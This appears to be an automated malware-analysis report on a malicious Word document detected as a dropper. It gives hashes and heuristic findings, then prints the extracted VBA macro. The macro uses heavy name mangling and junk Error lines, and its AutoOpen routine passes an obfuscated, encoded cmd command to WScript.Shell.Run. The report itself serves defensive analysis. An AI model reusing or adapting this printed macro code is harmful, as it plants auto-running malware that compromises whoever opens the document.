Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8504ad891d9af936…

MALICIOUS

Office (OLE)

Size: 81.1 KB
Created: 2018-08-24 06:45:00
Authoring application: Microsoft Office Word
First seen: 2020-05-14
MD5: 2fd2cccdba02a125bbedca1cb217387c
SHA-1: a26ac7fc79eafcfaf8c98b33e3f88dd58ec76cf1
SHA-256: 8504ad891d9af93640a44744c9a4f3c00bfb2f2fabdd99dab9cbc19c6d3873a8
Risk Score: 310

Heuristics (10)

  • ClamAV: Doc.Dropper.Valyria-6665595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Valyria-6665595-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    NtLmiKwO = CreateObject("WScript.Shell") _
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    NtLmiKwO = CreateObject("WScript.Shell") _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10584 bytes
SHA-256: 0eee9c760f8f49623ff34a60a6db5dfd8c7d617e0b6879626e1cf64fc24c4636
Detection
ClamAV: No threats found
Obfuscation or payload: likely
144 of 226 identifiers look randomly generated (e.g. 'znLKzJzoudlYA'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "znLKzJzoudlYA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ApWzUKnRosNSQ"
Function AAQTwY()
On Error Resume Next
Error TsBOk * PzbIr / EGIrlR * tBdawp
   Error 80496 * XVtGNU / GJcGUz / ibFhc
   Error cdirr / ApSFY * Jcsqw * cVpkE
   Error mGlMo / iRXmB * KVjkTi / 41263
azsTMArRGVs = "Md /V^" + " " + "^ " + "^" + "   /" + "c   " + " " + Chr(0 + 2 + 1 + 4 + 27) + "  ^se^t"
Error 86001 * uXftQL
   Error 65237 / 51968 * vRDLS / MCftpY
   Error YnNiX / fbfhw
   Error 48347 * BOrfwL * 84365 / lCSPk
iPhLN = "  ^ ^ ^" + " ^6^bv" + "=AACA^g" + "^A^A" + "IAAC^" + "A^gA^"
Error CnWmM * zdJdWH
   Error 49727 * KwZVd
TqkZmJPM = "A^" + "I^A^AC^" + "A^g^AA" + "^I^" + "A^A" + "CA^" + "g^" + "A^" + "AI^A^A"
Error wAFiQf * BqYLln * 4118 * sPcUD
   Error IXMki / hjHdFJ * 78225 * IFmzEB
TcNlBV = "CA^g^AA" + "^IA" + "ACA^gA^" + "Qf^A" + "0H^A7^B" + "AaA^M^" + "G^A0" + "^B^QY^" + "AMG" + "A" + "9^B^wOA"
Error AMbLf * UBoFn
   Error DwGwti / hUhntR
   Error 13147 * IrBXkJ
HKPspJlirRN = "s^" + "G^AhB" + "QZ^AIHA" + "^" + "i^Bw^OA" + "^M"
Error zMPHSO / VaqFs
   Error qaVcff / SOavXR
   Error 58038 * RhbBl
   Error FvRXf * hTUOGX * TbTjj * 93335
jCjmN = "F^AuB" + "^g^" + "YA^" + "QC^A^" + "g^" + "A^Qb^" + "A^" + "UGA^0B^" + "Q" + "^S^A^0" + "C^" + "A" + "^lB"
Error nUPbIH / OZHWz
   Error 13590 / 28029
   Error YGvni * oMuwWP
   Error jiHTJ / BwhfM
   Error 40892 / zzWLc
lPzsiUdjqEQ = "^w" + "^aA^8" + "GA2^B^g" + "^bA" + "^" + "k" + "EA7A" + "^QKA" + "^" + "M"
Error zGbKQV / csXGZ
   Error 87085 / PHUAFb * 4769 / ztAtM
   Error 36167 / FKjnQf
   Error dKDTwP / 87355 / MQRjw / 59626
   Error 78720 / pYzJNh
bskdYj = "F^A" + "^uBg^YA" + "QCAg" + "A^AL" + "A0E^A" + "vB^Q" + "W^AQC" + "AoA^QZA" + "^w^GA^" + "p^B^"
Error QjXvXi / kzihv
   Error lbRPcK * DvQAjj
LzahjSi = "g" + "R^A^Q" + "G^Ah^B" + "wbAwG^A" + "u^" + "B^wdA8" + "G^AEB" + "g^LAo^"
Error 60966 * 19933 * qOcFY / 41213
NYAswfQFLbJ = "G^A^U" + "^BQ^WA" + "QC^A^7^" + "BQ^" + "eAIHA" + "^" + "0Bw^eA" + "^kC" + "^AM" + "BgQ" + "^AM^E^A" + "^kA^A^I" + "A^4^"
AAQTwY = azsTMArRGVs + iPhLN + TqkZmJPM + TcNlBV + HKPspJlirRN + jCjmN + lPzsiUdjqEQ + bskdYj + LzahjSi + NYAswfQFLbJ
   Error 24984 * rRluP * uPGhpV * csNWw
   Error XlHpE * isSCK / BQOGk / kWWls
   Error QBwsp * kiPMHJ
End Function
Function nkWaqCkJW()
On Error Resume Next
Error 30627 / 23549 * vltwpz / 58476
   Error TRzrF / IwoQfR
   Error jGXzl / QvpFK / pEFBwD * hUnNl
sDmuNHIlkD = "GA^p^B" + "^AI^A" + "0^E" + "AvBQW^A" + "QC^Ao" + "^AAaA" + "^M" + "G^A^h"
Error apOMFp / zjdbzE / 15638 * Llfiz
   Error VGXvhi / GknLC * 26645 * YjnzhW
   Error 78341 * SmtsmV * AVzDM / GrZhj
nzHbKrHiLqL = "^BQZ" + "^A^I" + "HAvBgZ^" + "A^s" + "^DAnA" + "QZ" + "AgHAl" + "B^gLAcC" + "^Ar^Ag^" + "W^" + "Ak^"
Error 46393 / IGjjo
KVZpGBEDc = "F^A" + "^i^B^" + "AJ^AsC" + "^A" + "n^" + "A"
Error 32301 * cdiRna * sRipjN * IQrdpb
   Error 88762 / kTGMpt
   Error pdUIoJ / FZatn / 72944 / utmEr
   Error MOPBq * 49662
TAvChlzrOmB = "^AX" + "AcC^" + "ArAwY^" + "A^" + "kG" + "A^s" + "B" + "^g^YAU^" + "HAwB^gO" + "A^Y"
Error lWMNv * ihfzzh * KzhXd * wiSqU
   Error 63377 * hILzF
sKhNblmb = "H" + "A^u^" + "BQZA^QC" + "A^9A" + "wU" + "A^4G" + "Ai" + "B" + "AJ^" + "A" + "s" + "^D^AnAA" + "N^AI^D^"
Error npbTj * FmUPwt
   Error OlmmO / CDWXw / ZkTKb / oSwib
OiavjV = "A" + "^yAw" + "J^A" + "A" + "C^A9" + "A^AI" + "^Ao^F^A" + "^ZB^g^Y" + "^AQC" + "^" + "A7A^QKA" + "cC^" + "A"
Error Gvjiar * KjzOYY / 71240 * hJmkX
   Error 90558 / mttInl / 41436 * cjiorr
   Error MGcJb * tNOHO * TqZjJz / abakq
   Error iEVXRQ * YGqFSM * 14861 / cMMSvl
XGiIIZ = "^A^B" + "^wJ" + "AgC" + "^A" + "^0^B^Q" + "aA^" + "wG^Aw^" + "Bw^U^A" + "4CAn^" + "AQM"
Error 70985 / UTpcZ
XUiaiIu = "^" + "Ac^H^" + "A0" + "^A^gMAo" + "^FA^" + "H^BgN^"
Error OOHBK / ZOtCDw
   Error 39691 / UoqMM / 15239 / GicoWz
   Error 84126 * AiEHRa
YKsCf = "A8C^AvB" + "g" + "b^A4CA^" + "z^B" + "wb^A" + "w^G^A" + "lBAaA4" + "CA0^Bw"
nkWaqCkJW = sDmuNHIlkD + nzHbKrHiLqL + KVZpGBEDc + TAvChlzrOmB + sKhNblmb + OiavjV + XGiIIZ + XUiaiIu + YKsCf
   Error lkFrvz / NdKjvW / tWrsOF / 2650
   Error ClsvGv * IrRjG
   Error AlXNP / BDLNzi * zJikWz / vUrAWW
   Error fpQoDw * 98003
   Error zzYcj / EuOfw / AtwzDZ / uJvNjj
End Function
Function TGYwfRXiBE()
On Error Resume Next
Error 92496 / HhOKYW
   Error 3840 / luArSm
   Error 58475 / iHufa
BcCJa = "c^" + "AUGA" + "0BwL" + "^" + "A^8" + "C^A^" + "6A^" + "AcA^Q^H" + "^A"
Error 94287 / vKatG
   Error 17260 / SnnRN * lWrwA / RWsrQQ
   Error 51186 * suoLPD
   Error 19923 / zWLXo / 33197 / wmcLS
ARANGbrCiE = "0" + "BA^a^A^" + "A^EA^1" + "^Bw^LA" + "^" + "8G^" + "Aj^B^" + "gL" + "^" + "A^0G" + "A" + "v^" + "Bw^Y"
Error 85374 / YJlct * QzwfNz / 37867
   Error 76858 * AculvC * 13974 * sWcMY
SknmGwAZaX = "A4C" + "AuBw" + "bAk" + "G^" + "A^0^B"
Error STwjTc * mLGvjH
   Error 15567 * cYqwod
   Error 22503 / iKdjLc
   Error 41828 / ZjWzD * 48960 * jFVqDz
AwIjbj = "w" + "YA^U^GA" + "^0^BwbA" + "I^H^A" + "^wB^wb^" + "A^kGA" + "2^Bw" + "^"
Error 61894 / cuwFzp / 74399 / zLbGcN
   Error aMADYW * CoYEG * 31105 * sdPdw
   Error ZJNlkG / 12477
   Error jwjAIL / sOmkF
HvRKw = "LA" + "^8C^A6^" + "A^AcAQ" + "H^A" + "^" + "0"
Error RtrciW * 25040 / 46961 * lLkNM
   Error Pzbtf / ufomz / EfjRn * rKFhv
jYHPjrPX = "B" + "A^a" + "^" + "A^A^EA0" + "^A^wZ" + "^Aw^E^A" + "vA^Q^b" + "^A^8^G" + "Aj" + "B^" + "gLA"
Error RIBZE / ESSBcP / 29444 / BcINQC
OZthQwavt = "Y" + "H^A^l^" + "BAZ^" + "A^gGA" + "z^" + "B^Qa^A4" + "^G^Av" + "^B"
Error 31256 * csuVha * mRAPnw * MLnKQ
   Error 69825 / zCJHE / nqBMsR / MnilrJ
   Error 96541 / 28716
HIMdrUv = "^A^d^A4" + "CA^" + "l" + "Bw" + "ZAEG" + "^" + "Aw" + "B^" + "Q" + "^" + "Z^A^0^" + "G^A" + "v^B^Aa"
Error 60768 * AFOsov * 99612 * vsMZW
   Error 98497 / wDvfOA / EYYLu * ijubH
   Error 66292 * IXwRdR
   Error LVPqW * PTAiA
AqupuREt = "^A0C" + "A^4^B^Q" + "YA" + "Q" + "^HA"
Error QjFIM * RzOvQ
cRjNNBOVr = "6B^w" + "^bA^8" + "C^" + "Av^A^g" + "^O" + "^AAH^A" + "0B^A^d"
Error 62363 * 96432
   Error idiMDw / nRUbb
   Error 94648 * QoHNM / 40289 * mFOHT
FAGWO = "^A" + "^gG^AA" + "BA^T^As" + "G^AyAw^" + "YA^"
TGYwfRXiBE = BcCJa + ARANGbrCiE + SknmGwAZaX + AwIjbj + HvRKw + jYHPjrPX + OZthQwavt + HIMdrUv + AqupuREt + cRjNNBOVr + FAGWO
   Error iVmzRD * 54111
End Function
Function CZwToYDn()
On Error Resume Next
Error 75329 * VvopW
   Error PjBZkB / iqcwv / dRrlGp * 52389
   Error 96081 * jtaKzJ
   Error sRUKm * Jkkin
AjWifqfQiS = "I" + "^G^A0A^" + "w" + "^L" + "A"
Error 18551 * KXDED
   Error OTRuUf * rPUsM
TWnopnuq = "UHAlBg" + "L" + "^A" + "MH^A^" + "y^B^Q^d" + "A^8^" + "GA^s^" + "B^wb^A" + "MG^Au" + "^B^Q"
Error 16055 / iRbWF
   Error 83519 / pWcQmv
lJdHKZbNL = "^ZA^YH" + "^A^lB" + "wcA^4" + "C^Ak^B" + "^A^" + "bA^kG" + "A1B^gY" + "^AE"
Error 62754 / DBtsF
   Error tSTUm * mBFZm * NbVcjF / CuETPz
   Error aHZmMz * LaYPCT
   Error 27268 / WSTTki
hXUQrwsksTw = "G" + "Ay^BQZA" + "QH" + "A" + "v^A"
Error 74118 * bfowD * GIMuf * 74580
   Error QPuDQC * 57386
zlNOAfa = "^wLA" + "^oD" + "A^" + "wB^" + "A^d" + "^AQ^HA" + "^" + "oBA^Q^"
Error 44287 * 94885
   Error MKsiLz / WRWbU
   Error KdTBjs / CUnVwk / 57692 * 28144
   Error 85966 / jYFTj
   Error BHutw / MUmWH
NXFErTT = "AkH" + "^AvA" + "^Qb" + "A8" + "^" + "GA^j^B^" + "g^LAE^" + "G^A^2" + "^B" + "^Qa^A" + "Q" + "H^A^"
Error 26009 / nKpFM
   Error aHSFa / zDMJG
   Error 94259 / iCcUl
FQUXDrdZ = "yB" + "w^b^AAH" + "^A^l" + "^B" + "^" + "AZ^AE" + "G^Aw^" + "Bw"
Error 21010 * lwnDHj / 17576 / zFWvz
   Error hEHNk * qlPcjI
   Error 76265 * XaBGZG
   Error qUDvG * aaiVob
IFuapz = "^b^A^" + "I" + "^H" + "^AuBwb^" + "AkGA^" + "o^Bwc^" + "A^EG^" + "A^" + "mB^Q^" + "Y" + "^A^" + "k^GA^t^"
Error EFfIXW * bvdYO
   Error 72242 / JMsIL * AAPmn / HRhNou
   Error XAfFOk * DizLqG
UsbwCTso = "B^wL^" + "A^8C^" + "A^6A" + "^A" + "cAQ" + "H^A0" + "^B" + "^A^a^A" + "c" + "CA9AAT" + "A^I^E^" + "A^" + "D"
CZwToYDn = AjWifqfQiS + TWnopnuq + lJdHKZbNL + hXUQrwsksTw + zlNOAfa + NXFErTT + FQUXDrdZ + IFuapz + UsbwCTso
   Error WANvA / jwjPjq / 43879 * MVcUB
End Function
Function ZAZFaKiQqLI()
On Error Resume Next
Error 80663 / 52489 / 92614 * wNRwBM
   Error UijZR / DOPwf
   Error PmLfN / vUDiX * 13554 * kwVrM
JFSLiBTWW = "BA^JA" + "s" + "DA^0" + "Bgb^A^U" + "G"
Error HhBqP / FjbHD / lMQvGp * AwkGmN
pVUjzo = "^A" + "pBA^b" + "^" + "A^MEA^" + "iB" + "^Q" + "Z^" + "Ac^F" + "Au^A" + "A^d" + "^A" + "^UGA"
Error 64274 / 9052
mCikrYI = "O^BAIA^" + "Q" + "^HA" + "^" + "jB^Q^Z^" + "AoGA" + "iB^w" + "bA0" + "C^A^3^" + "B^Q^"
Error 38954 * cdPUAw
   Error 8101 / iBbGs / 43240 * HhhQlj
   Error oDZVc / rzTrp * VdWaO * KBYbVD
TswpwBjJ = "Z^A" + "^4^GA9A" + "^" + "g^aA^Q" + "^F" + "AZ^B^A^" + "J^ ^e^" + "-" + " ^l^l^" + "e" + "^hs"
Error NNDPzG * FXmOjN / 65262 * lYMIw
   Error wuYVpt * saloqH / 80473 * oJcNWi
DQTzsvVbI = "rew^o" + "^p&   " + " ^f^O" + "r /^L  " + "%^w ^i" + "n ( " + "^1" + "^013^ ^" + "  ^ -^1" + "^" + " ^ ^  " + "0)^D"
ZAZFaKiQqLI = JFSLiBTWW + pVUjzo + mCikrYI + TswpwBjJ + DQTzsvVbI
   Error uzMfN / HntcQ / qiRuH / McrXaf
End Function
Function UkMWDn()
On Error Resume Next
Error jjVCq * IaphSf / dBwfY * ziKSO
kfRnUt = "^O  s" + "^e^t ^m" + "^bS=!^" + "m^bS!!^" + "6^bv:~ " + "   %^w" + ", 1!" + "&" + "^I^f" + "  " + "%^w =="
Error YXZjZd / bDXZa
   Error auGjlZ * 41408
   Error 66380 / bNoAJ
TfpJmjlLn = "  " + "^" + "0  C^" + "A^l" + "L" + " %" + "^m^bS" + ":^*" + "^mbS^" + "!^"
Error iziZpr / FmQaiR * AKNvwZ * tBpIlW
   Error wFjDQA * BjCzYF / 96990 / PajEZD
   Error NhwLYA * maDJp
   Error IiUjQ * 50180 * qiELl * vpREVv
JiKzIjTtOE = "=" + "%  " + "  " + Chr(0 + 2 + 1 + 4 + 27) + "    "
UkMWDn = kfRnUt + TfpJmjlLn + JiKzIjTtOE
   Error iTtwuY * rpjzit * oEGYN * 43002
End Function


Attribute VB_Name = "YBEISfwZXXh"
Sub AutoOpen()
On Error Resume Next
   Error rONqm * CJQtzO
   Error 48152 * NBlXc
   Error 21614 * wbHaSs * DfiWX / wlfjDM
NtLmiKwO = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(12 + 4 + 7 + 5 + 39) + OhrOYobRKQ + NukjzBt + AAQTwY + nkWaqCkJW + TGYwfRXiBE + CZwToYDn + ZAZFaKiQqLI + UkMWDn + XINXMRiRpSFu + IvhiVpbowuUMTR, 462569852 - 462569852)
   Error ZJiKS * zwNLP * 82992 / 82141
   Error 50357 * OhnqYd / LWwAUw * KXvbkQ
End Sub